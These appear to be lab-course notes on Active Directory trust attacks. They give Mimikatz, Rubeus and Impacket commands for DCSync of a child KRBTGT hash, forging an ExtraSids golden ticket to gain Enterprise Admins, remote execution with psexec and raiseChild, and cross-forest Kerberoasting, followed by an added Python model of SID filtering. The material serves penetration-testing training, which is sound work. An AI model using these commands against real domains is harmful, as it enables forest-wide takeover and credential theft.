Domain Trust Enumeration
```powershell
Get-DomainTrust
Get-DomainTrustMapping
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
```
To perform this attack after compromising a child domain, we need the following:
1. The KRBTGT hash for the child domain
2. The SID for the child domain
3. The name of a target user in the child domain (does not need to exist!)
4. The FQDN of the child domain
5. The SID of the Enterprise Admins group of the root domain

With this data collected, the attack can be performed with Mimikatz.
```powershell
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
Get-DomainSID
# Can be a fake username
Get-DomainTrust
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
# Mimikatz way
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
# Rubeus way
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
# List tickets
klist
# Mimikatz
lsadump::dcsync
```
We can also perform the attack shown in the previous section from a Linux attack host. To do so, we'll still need to gather the same bits of information:
1. The KRBTGT hash for the child domain
2. The SID for the child domain
3. The name of a target user in the child domain (does not need to exist!)
4. The FQDN of the child domain
5. The SID of the Enterprise Admins group of the root domain
```shell
secretsdump.py logistics.inlanefreight.local/[email protected] -just-dc-user LOGISTICS/krbtgt
lookupsid.py logistics.inlanefreight.local/[email protected] | grep "Domain SID"
# Can be any name
lookupsid.py logistics.inlanefreight.local/[email protected] | grep -B12 "Enterprise Admins"
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
export KRB5CCNAME=hacker.ccache
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/[email protected] -k -no-pass -target-ip 172.16.5.5
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
```
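As an added example (not part of these notes), the Python below models the SID filtering check that a trust with SID filtering/quarantine enabled applies to the forged ticket above: the injected Enterprise Admins SID belongs to the root domain, not to the child domain that issued the ticket, so it is stripped. The RID 1108 and the RID-to-group map are constructed assumptions; the domain SIDs are the ones used on this page.

```python
# Added example (not from the page): a simplified model of the SID filtering
# that a trust with SID filtering enabled applies. The RID 1108 and the
# group-name map are constructed; the domain SIDs are the ones on this page.
import re

DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")
# Well-known RIDs of privileged groups; a foreign SID ending in one of these is
# the classic ExtraSids signature (519 = Enterprise Admins in the forest root).
PRIVILEGED_RIDS = {512: "Domain Admins", 516: "Domain Controllers",
                   518: "Schema Admins", 519: "Enterprise Admins"}

def split_domain_sid(sid):
    """Return (domain_part, rid) for an S-1-5-21 SID, or None for other SIDs."""
    m = DOMAIN_SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else None

def filter_sids(trusted_domain_sid, presented_sids):
    """Emulate SID filtering on a trust boundary (simplified model).

    Only domain SIDs (S-1-5-21-...) are evaluated: those issued by the trusted
    domain pass, every other domain SID is stripped. Returns (kept, stripped),
    where stripped is a list of (sid, reason) pairs.
    """
    kept, stripped = [], []
    for sid in presented_sids:
        parts = split_domain_sid(sid)
        if parts is None:  # well-known/builtin SIDs are left alone in this model
            kept.append(sid)
            continue
        domain, rid = parts
        if domain == trusted_domain_sid:
            kept.append(sid)
        else:
            stripped.append((sid, PRIVILEGED_RIDS.get(rid, "foreign domain SID")))
    return kept, stripped

# Constructed PAC group list for the forged ticket built above: a child-domain
# user (RID 1108 assumed), Domain Users (513) of the child domain, and the
# injected Enterprise Admins SID of the root domain.
CHILD_SID = "S-1-5-21-2806153819-209893948-922872689"
FORGED_TICKET_SIDS = [
    CHILD_SID + "-1108",
    CHILD_SID + "-513",
    "S-1-5-21-3842939050-3880317879-2865463114-519",
]

if __name__ == "__main__":
    kept, stripped = filter_sids(CHILD_SID, FORGED_TICKET_SIDS)
    print("kept:", kept, "stripped:", stripped)
```

Without SID filtering on the parent-child trust (the default inside a forest), the stripped entry would instead be accepted, which is what makes the ticket above work.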
```powershell
# Enumerate cross-forest users with an SPN
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
# Rubeus /domain flag
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
# Check foreign group membership
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL
# Convert SID
Convert-SidToName <SID>
# Log in, if we are part of the Administrators group
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
```
```shell
# Using -target-domain
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
```